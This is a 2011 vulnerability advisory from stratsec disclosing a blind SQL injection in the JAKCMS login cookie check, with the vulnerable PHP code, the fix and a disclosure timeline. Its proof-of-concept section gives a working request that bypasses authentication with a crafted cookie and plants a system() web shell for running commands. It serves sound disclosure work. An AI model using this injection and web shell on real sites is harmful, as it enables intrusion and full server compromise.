Feb 18, 2011
- Title: JAKCMS SQL Injection (SS-2011-002)
- Version: 1.0
- Issue type: SQL injection
- Affected vendor: JAKCMS
- Release date: 18/02/2011
- Discovered by: Steven Seeley
Summary
JAKCMS is a web based content management system that allows the publication of galleries, blogs, events, videos and newsletter’s.
stratsec researcher Steven Seeley has identified a Blind SQL Injection vulnerability in the JAKCMS core which can lead to arbitrary code execution against the underlying web server.
As a result the vendor has released a patch addressing the issue. stratsec would like to acknowledge the speedy response time by Jerome from JAKCMS, producing a patch within 72 hours of notification.
Description
During the authentication process, a check is performed to ensure that the user accessing the page is not already logged in. This process is done by validating the cookies set in the browser as ‘JAK_COOKIE_NAME’ and ‘JAK_COOKIE_PASS’. If the cookies are found to be set, then an SQL statement is executed to help validate if the user is logged in. This functionality contains a blind SQL injection vulnerability, triggerable through both the ‘JAK_COOKE_NAME’ and ‘JAK_COOKIE_PASS’ variables.
If a valid query is provided and it returns a result set, then the user is granted access to the administrative console by setting the session variable ‘JAKLoggedIn’ to true. Below is a snippet of code from ‘class/class.userlogin.php’ on lines 65-76 highlighting the vulnerable code.
public static function jakChecklogged()
{
global $jakdb;
if ((isset($_COOKIE['JAK_COOKIE_NAME']) && isset($_COOKIE['JAK_COOKIE_PASS'])) || isset($_SESSION['JAKLoggedIn'])) {
$sql = 'SELECT * FROM '.DB_PREFIX.'user WHERE ((username = "'.COOKIE_NAME.'" AND password = "'.COOKIE_PASS.'") OR (sessi$
$result = $jakdb->query($sql);
if ($jakdb->affected_rows > 0) {
$row = $result->fetch_assoc();
$_SESSION['JAKLoggedIn'] = true;
Impact
The issue permits an unauthenticated attacker to execute arbitrary code against a system exposing an unpatched JAKCMS version. This is due to functionality made available once a user has obtained administrative rights through exploiting the SQL injection issue. This issue may result in the complete compromise of the underlying web server.
Affected products
JAKCMS <= v2.0.1
Proof of concept
A proof of concept request has been provided to trigger the authentication bypass and add malicious PHP code into the site map page of the CMS.
POST /[path]/admin/index.php?p=plugins&sp=newhook HTTP/1.1
Host: [target]
Cookie: JAK_COOKIE_PASS=test; JAK_COOKIE_NAME=admin"))+and+1=1--+%3b
Content-Type: application/x-www-form-urlencoded
jak_name=vulnerable&jak_hook=php_sitemap&jak_plugin=0&jak_exorder=1&jak_phpcode=system($_GET['cmd']);
Once this has been completed, an attacker can simply execute commands by running:
- http://[target]/[path]/index.php?p=sitemap&cmd=[CMD]
Solution
Update to JAKCMS version 2.03.
Response timeline
- 11/02/2011 - Vendor notified.
- 11/02/2011 - Vendor acknowledges receipt of advisory.
- 11/02/2011 - Vendor confirms issue presence.
- 14/02/2011 - Patch released in version 2.0.3
- 18/02/2011 - This advisory published.
Download advisory: SS-2011-002 stratsec JAKCMS Code SQL Injection Advisory v1.0.pdf